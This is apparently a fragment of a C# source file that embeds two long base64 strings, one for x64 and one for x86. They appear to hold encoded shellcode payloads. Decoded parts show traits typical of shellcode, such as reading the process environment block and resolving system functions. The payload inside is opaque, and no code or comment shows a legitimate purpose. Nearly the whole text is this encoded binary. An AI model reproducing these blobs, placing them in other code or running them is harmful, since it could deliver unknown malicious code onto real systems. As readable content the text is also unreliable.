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";
13 static string x86 = @"6HAaAABwGgAAVSnoKp1LzdK1HEs0X3r9bf+qVLzkNZvoNJns6y/H8kRxnjq5Ea+2/sedfSTCJHDza5/GsZ6kCcjvyx7iQRE/jRSkSj+8tLR5MI2jtrFt/tKCX94QC+VpUC2NsjnyFp+GoaxbIjz1iMp4bF3lm/iEzywqCkdM83uWF1rpEdlSLpbwitGnSZkxMDEKadO6hvKrRNSOjvNwaqXNjO/sQCe8Z6JteIefp+9sO/G308eRb914rdFW3/P2GUduxJnaHDCk1FIcEBHGlZfiUXlDbhw7V32Zx3BDIaih2e10FMCua0pamOaAsdFgPav964yVQ/mN5XiI6Yn4lEoa7ACuFFjeYHIHrBWOaiMuJdXOAd4k3VBUTGZcUdLcIzD/yl/crcWVolqV8U/QETN1tb38AaTrIchsvTJ8Q6NRW1Il7XGZsz1AqMLRGqA3h3itDLKBotRGYB5y/ieFoGZsOtnRgLynIY95Uf/jfdbqrFbbXVbdxmmeVdQughKOCRLtC4R5RmXElMPU1dwQ5rEGkuUYrPU5JafDxX9s+PXwTXk3FIJ3vUi5hCumn7chAQGn9LJVbNiPeRbeLP/6TPABYvuTXhJMaM3CHH4zpL3GCdPqUM7W7uWXl4fgPOJcXBLitC4rHo9VBxLK/J9KXcD/y+JGYYylvILyCTCg+7JAy2H8NrzTCdLihplc803DFv7sDFO4lNnXXKimf6jLm+xLF0eqLHCBi+91iIyfkLgXqFFsWicT4GtPGY7gCHyb/yq5xCYdC3Nj4vh4OMSL+QUjyXhuNHSamAtwcF3G9GrIVT76IiWdiwphK8tfYTY+Jx+TEybWD6JY0fEsl6N7DBTHNjHoEFwhPIPbWKPbFFPPdQaNZvZ0QkkYuqOnE0YWkXzWiGsqC6BLiBzfLYzx/joL/GsuumG5dyQCSaqAd9Cp3yPe3js1d+LrWN29L7oPxYvBKB6Iay4aIv6Xzy0rw5RSd1u9TI3Ai3krI8W+R4OmSTd5qbt0rAI1XQlh7BGeJ+zOnfHfWGLm7OC8MXSQIrknF3CcaDP35ATnbE3Jc1O7LIJMkogcRZSNoWZ6CKifsqoCtJnM/EJFEZpV2I/6oQ1APU1qaGf8J0BA/AnDYyJH8/5i0XRsIVUUqMzQ3HOcUVcpuOLBRvZhTI0mjKcc8KxK/NkdZiJ3L/rixqelfJR6W/U8HP0J7TdzCmXmquTGGWgRO7kOTsE/mwU0LKkSn6R43zYaXT/+DXKzLq6Th69l6irsT3NXGPDVrJAvx1eBwir0JJ4kSLAA3ccQ9R0+gin5kjwclouLJrymOe32E6Y8UV+6ISWfhKPEOedSdQZgyti8igJucmZA79vHvRSv6cygh2mEP75b6oYAH49LqsND0Mn9xb2jg7GZENr8Pk2+siycX32ZR/QMirELyb09tpnVUl7scWHQKEqkYBaxoGdswNKFt1HQzg1SpQRU71lcbRZ0xM8z+5gDRfrb1iD7QLdOlHyfZo8C661RlF0faGQ9suPlH9TSLNKiVGGPkqpOQOWajK72ctr0MzJnIIPQN83qj+JT7sE44DGDL+U2XvbZo8f8je1AhR2MTpv2Af7tlrVP+gLGB8hw8wtV1UipiqgpZV+oYoATkL/TrNEh/M9aRyzRtC1rTZG6IlBPhBA8NoZtazI8Ssw03P9x30ioSiL5GDN4g41lKipJt/XCoXjGZSgstpjQKp96XIni2z9josBnI/09pjkR5g6usxQUiKMgtItovfFTPH8T9nE2UaxjGoyxI/DzKs0pJ+HtuyLnpVK2Q72Bb4QQxIo4rmaXUTMmvYhTcVkmca07abRo37ulZ+IOokJ5s7zdmFdTuLWcyzTNtQG/+0qZvxED/GropAv56EeyoJ4g8xmqxMq2mFsjHm/hcPmPOurXeSacQ2YuOEjzksq0IkgiVKATZg1zib+hRCL5N+yxSzMRvoBU+gpre+fja3+TBLIm9U0sAdf5iwQz4rJg0FkSGSRzV04h551AJEuudlsAeIZ5U8Ov0j5Fh4/Dm6tukhWFicZa5jQcSQfdD6EvFppO8tVU3ifdAVRTJKqmJgRm5MgXr9L+mfDD8KYFzoAyfQhXNGUSQitH4ipgPpGCkrse5w8Cg3TqomEUvl4RhGR0xQJEIrdpM4GRFM4ssOAU44D1hXScFO78HO+W/USiOBzRj0Cau6hzMbzowL11PkksBWmSGosts782IWkJmhQY2X+uFMj/8Y76Htcd4349u0NDwapGicAdscXVST0kGF8OziqiBRYsypJpnTMvdkXCXG2+UkjsR//1TFHktT50t2Fj+Nhw7fmEAF9LnTsHOJQN97Sn6aGuXQrgUFc7vRB4wvtT1fmsPJp7dTxfg60ENgVRNvPnnfanwgpOWV+5vUdnT3tTIkY+kMm4I9mEW2+X/O91A92/CMWbgS2qhWOWrqEQLAhrcLsL+DtAXXGSW3B3TFi1Bkat9juoLPwsKypL/Fg/B5j5vatMFIvxjUgIetuuzCm+4epPKIXc9boItv5VgUPap6IsLNw4HtfIE7iNVf2MKfhoVdMZyv3Ep1h0inN4NT1SFZBXOK0cUqjiZBD6IyAadpVntTOI9fvp1n68vPRRkGNCfWRn0m+pVAH6XHmvmtB4PCTyIxZPvO301+oo/bWMG2P9Ze7b1MmBtPqu2UzRWmSPMyK2BoJlUpy1b98yTLh7HxoNHIGQYQcWDA1MweTzHkCGra/abRL8NwnM+hpZKjrlBRVri15V18h1yoVd4p07918rnsrcPm1kDdADMJkVdlfsKl7gahzIkkeOqySMnkhPzSTWYrBDX49Oy1hW5O9oE+1nlb3qGuOE1ltUHAjW77sdUuZZGETFFHNaOs4RimdgerUzH8XoRzoX/2B55KGLNrd8MyTuFzCfHK2PhqNKf17o1e4SoFJUxzGSXDQLwapOWt8FsD2jAh+ggdRZcztDNhtBG8lUia5H4YIgFA0SRdy6Iy011997GitgPBkNlzmOAw139BB4k91D/8gYCjPzu/QXGak/s05TdUN/byV3sVjRFEZBYFo6sZQCH/u+7noZJudlNFaUc72mfFv9c2rwr8ZNO+K0lTB13Zp4HjzKwqQ88TqsJncTbo+wvvcD5bnwHYc9kfjkxRxmC8qu4Y1b5d7Lep8933pSxH1PkNnzHNPscfcl8x6BVV4lWAcf9i+cG07Sc7aE8aXG/PrmciC1950FShuD9hefRHTrvdHYkOAVjiZmzhDSf6llP3Uj0vxINngdqVn0uNzLA0jF0pk20WIWnW2K0iuHWH4Vf15sOpCofb/IPWKVq+i9s/aL/5dTw5kc9VB9Kasz6pv46L/PXfAyiov9kf+17fWoWs5I7h8vOt2G/8EDi9+HCZFQ3txh2+tuMhi41V+q9rXEYKbqxh+2ph2cf7iTeNWU5z+ntLRRH0j2XEoM3/Ipx2fOTVfelfw25Ao3BAzbYgRNx+FuHRv3+A9NmsLY5e5uqLWlpbjlZWDyayYqKLWA6e9ZSc+OhqOz+7n0LvQtENSxzvAbYk+8Oyeps/kPrB33h1hQ0tYrwpt3acqSP2Mr4/924EaRIBcdpidKFDkUuuV5Qz+SJoQIGKWxhMZ0yXCL8kWWYC2qVM6jiNz8nKCcewjh6LQFA3UDLqzXpvuxtEykGZTJ9/s02CtZvN+4F795LxH9F9lY+ysnd11nJVrPftwtgLxaO0IyX0sHsPKptlPDk5vPR72SLU/Y4y4Qd43oLfthcSLj3+iwFBxwTBpznPwPW5Rpa1cVSEgXml7E26QIQPRf8NVJ+ysf8Ev8m7phY69zmyDkQX52UzxEOz+JTuHiwfQwCnp1g/zsWRRJiDN9HJNyitwxqWIe655KYzhtbln/0Ok03oUhEyr6eiPegDDeFIOzOw+lRWJEFW3+jv3RrXZYmOosMa1pSuYiBs9OjxMCUfOOYfXIYjuDospAQHJQ1WzyFT+dkiNrz0zlpvd8Ry1S3yKrVC0lxYlji8OXgtgp9yLqplWaJdo+oQJ9+iAORCrui5bwHzOyV5P9baYTq/qe/RYy6GzpLh0RrcviFHjAxy58iir6pyd5RhPpMqJYBCYqPM0RfFHQeRwyYpsxfA82EPyaWT20leTuRtb4lCzyFULwggNiwR32B5J9b319hKgf2k9+U2LyIIxqMQDiyHE9HOwaGTHwk1q7kXdsWt2um9MvHsWAEBd8/n8jVu+2q0Fb23Wfq78scrWzHVRN3xgW2f90gw84u5FN596yvB5UQ2FSsM5Ngiv3J1E+0lGbR+Jk4mW1pcey6fmUFQurdHsX2jRiFKB70s3OO/FSc8XMoOoFDM78nYUbVB0aLcVl2GlpMu7/h7FVeOmlM/WC0cEidfc8ai7ZCp5LOu+tug6+D9oqdRHWZ3AaQV+mKABO6dQYt4PC6t7MJcndQ3dt9IN97RaC46FQiVO39q7Kv9+dTxxiCX0eONrOPu7LrNbPMlhyC65R15BhFAK5f/Sy9XDI9DlIuTC72PbKNGXBqdKi2iPDkOBL3dLchgtxYStx0mJ+nexGLyXeiB88NtwFdM5FyOSKT7k4C4BGXRq75d/zFy7Bv78yAlrdpzqVuj52H7/IZaG/WfqIfAbf1T8Fv8LtVC7w/4/dNdclkTNvVNA3MR89t6lSDAygcw2aXhXgWUdfS/EerHgjLyn4jVgmByhBJk23zgkSWSTaQQsu+M8xv80HNY7hoVoZm/Olaye6xdmkaqt7Ka6jgTCGIAlK6YYuffBZciiNpUJF1m5REVrR7TGMxx327dWincxlE6xGhmeX9RDzc6GwqLFqTdgCei9iBmK1K0fGZ0MEXDB7PmaB3vVDA2bszXskzHFhGBKlDXC/w16ONGV0JR61uy7dHp1zMP4cyfiQRfvecWh0OM8wmYTrygLmmRDOFwiA7myQhvCcr0/UKp/yHB5CkjHgLBuL40nOjbbeRRZO00GlEdqQvdjVTpdN9xBEO0OY9i/AlUgaL+jqoNvSBCHgTB04TxUPS39hzyDR1Fcvx+OBL07Vp788tVwwu+mjrlDxq558zAb7EWSlLHcE/FVjw4XnCT1Rk9+wNOw+SXuMQddHD3ZWAwIw9G1BmIukFISmCxt52HL8a7egFLGNoWioeZmanLWT4rMf3n4WbLdk78t+EjihynB3x9YWDCr46yajsAAihVMHaSASvEBm8cxO/Pjk16ATMsiaAvW3WutbyYzWHZ0mKPuSt7TF+rONv5NR1zE3eyzrjcx6ci1YQPvG3T/gb3tTkLyNoCRxSTwj/tqDyOFG4jyxenHw2PbOoCuDj3+aXP6Y0e940DvLxigPRwRLOeq1DoGTo13GKfazK8tGHHlj8/QFk3T+DNHIQOPQfYDeWpGopLVLtPSkWWl1t4Cd+FhVsvNzvqSy4dCXpcbT4Yr/rcOqgpH1/GXXHqOmJS/kRKrBdoQ+2rDISnrGwJrfzBdSrbal+GCkND4WAFbYET9VrE7UicCVtMPPfvh1qtt+pWx+QEtFZ3fSVMwWplKl/dWdMHXsXnkAOeqS7f+L+dAFzkYjsmDpwFUM5iB9NciP3xQXUH12qilTHhJ0IbRZK2kBnh8dpvZaGT77SqlrY2C3CgND5W9G6QbksGJ7u0CGF2C320Q6kRDeznvkGD1qCEAwiCX5a57qD51cN3EZA0d5vym9kWv26hmcK9ehS7Gl61p7ZCv2dFQPlYz6tesi+TVCjsK0jYxBjj1og0MHIuXmkYiXby0Ym3bHiAwc2yd7oBfcrdWEtLVkkXRRs/RNe4tYO6t54n21jGgnNW6LRj8TvJxRIdDpfmlBJHBmZpkvdO0Iz6tG73JTsMf1HYxyGZOcbQP8VNyet135Dh5+I+nvTDh45/ipRooIQzw08CCxzgTgDCVn5ybjGLv46KyRgfQmwncOUImHExjAQ0yWWH9Xe8tr+qrLMGYCzg8sDtHrtEiQ/3dzxN33AQNtdJ8nxvUIHKw70LvlcomoBpvknmO+qoIUZV/v9jxl9fygQY7iB68N1VNBMa3O57U7dDQ9JNRRDorX1YkneqtlMC2a58lLap4JccdomldwPz19OWmy+uzvhyiWXU2LogfrvE1K6HSCgPkls7MxK8ps/dYVW/Aw84AxASEir4DcUZ5c+FYj2Tjlx+N+7TtY+N+D3n2M1YYqG0j7mIgK67BJ4WPQ9HnQ/z1uEqkUp13Gb4hIncGI69arKjlR/wESmhuIYxt4Mw3vLueO1V6UgiR8wdduZkI3oSEJ9ofPoKGbcJ7UBsdeK29F7EIl8osDISs4MEdi8/nmyEMiabupbPAetvURe3wuQX2+YYyIdF3+mhQ08WqgO1vmOzyPjXy5yWWIrurVL4zeNiUlcKbBdrTMszSsiWyV25ToXaKisrLYTT3TDTq4ocsvRG93qlLy0JN7yMB8f+hEtwdBDulwOHOQSJwKxcGVXXDCuR4BCQkRC3G+W01Jq0e87SnBkaoJWwUp1BaLJXBoYst47xtutzdbij2b4at//7+HTvqb7UPi1j0N47OCo+FU7D/RwsvYJH/jQNi78oSYM/Ozfp2k5lnvlXNxdBDRA4twQSxbvd75k+rDVczYZ1qCfQjeWNVm+JQrzmpholIOBcmt4avuFMRTnarc4lq61Bg6pkh5lwb832Mv/5oEjwaGV//J1VYv4zmO99ExLlf+48tBoFDKI/BFEe1uomN1KDr1l6TxKXHUdEGTPWIGWwURSvHa0VQQmtKelB1Y8og/VFtWhk+cMtSGywuP6hfrys8iQsC6vEE7ZsKelXEVTIemAlQizasvdMNTsvC7gKQfu/HJwi8oAb7cPUnDrMeFhzFLxX9IDPSsHJwV4NgaYKPt4dilb3IH2xrdbVMHExZ6dPF1LVx9VIuWbM0Z7NiXNvExrRTCLn6yL5KcmLN0Z+FhVwZfgX/U6UfznMCojDj+KLUtgFOkuKnlrZvowr4c5Z4ZT4m1Ak1d+acg9M3mYiN3x5P9HgSsOvRiaeTEYiAhD+bVdeZD9C2LUuXWNCJnGcTPIDvqHQt+A6HlZB/7it/qHZQDTHWmXUtzG2lyb+TQnFMrgjkLTIwFdZQJFxvm8gNF3wtj+EBpr/gkE4EbWW5yhCR8Ze2VzLtVflwzmutUJDZsUSaadKSHNUWMzlPavtbsllmxxbTaIPJ751GIebKY/DRPcg7RA+n8l9HicPtDvY8azzsDG8f6l08/CIUQEbvwxxEyGSZ3SEVNZJZTdXHjLjsjUuuTB/CTr+OKY9Y/5YUbfeolAONcizLlkg5Qyy4RxDWPehrc+tZAoXzIe2E+nz6Xw9aX8d+I3Ggd8ufIHRz+Flb71jhD28EGpt1nge0bPXT7JkLvzzA1MvBHCdaOECo65WzjyiiZkqIlI3XCehS9Pbv8obksflaFKhJ6a/mO4CFUmS6xR7oQMh2fOCcUs9ifO6HuxJp9o1XdBJQhYxeImWsiS8Nz74XyTuGb+tJBAvLjJKbKvaPAESUmoEysi1foZUjhrefLSftEsLw0Y9MfNu4rTFlivUdlpWNg2gd4LPnRA4harFhPtX54huWCgPtwHzabghMRCBDO1Sn6Q534QgRG4rJOb6nUFOK7viPa034c44exiNEycymhqag6ncC+SBeinO63Pv/Ma81ZuM6MFr6gd+tJvRLyPAjTWxA0NC8lzQORyap9LxUZ+svGq8Gmv47hM190Kv/0iwOkzOVutXDIrv/TUfsyCMWevbvG+S/5Ep1+M0qPayu2SrYvTqAKJ+AFjUtq7Ta7QinQHGNFllR9jpXkydnRwqBg4AsFMN0KxjBBZKPzDvp1mUTcs5rX08ldOwakh67BTMuKjLktDEAnTi72iWysoov29fO+pt0uo3mEOtD5HP3e45sQ8AGDniUeTD217bOIuqADk7oPavM+1pq/A1Qd8yfrWEQ9xWM/z9bZdvqDpw2ezrgcN3R2oUChYSL033oYtaWPwsUJNz5mhqVvxfRNSV3vqbECy9PqcsIXG5D/Ci5QV1iQIKS5ephCfvwy5sDp/FMBdJqVN5qk3IuQxsItt9Ze2O4AyFg6TmbJQsK3MmyF2dTmxOMo4rRmY/FUqaa4a2bRC/ZX3xD4mWCqnFMKaTrKmNXZx9rmYEWQhBbUXFa3Peb5KXLnv3yj4F2I0ctHr59e0856h/FHdqEjDTroZZl7X7wz9p9GKJ/voPsU5Wlpp0nMRzFgHph0TlOb9RD4J7SxQOsOCQo/9WsG3y57SlTF5xJrIBhoM1JyNdNhZ8SZwEQ7V6WhYxaSf1LjMwkxfGPQ1tEATYjBotyWlNAfeMYHDkVNbGu/baZL+6/pGpnYLlapmoHIf5fIXlYqlduS06ZiBgWPXRKDOmSPoie5rlyi/zMyUiu7pcm3YYuVe2YN9us1oZAuTQN/R0fxPYjJO8kOy4SNCvticOjvyXMH0FgONTjnI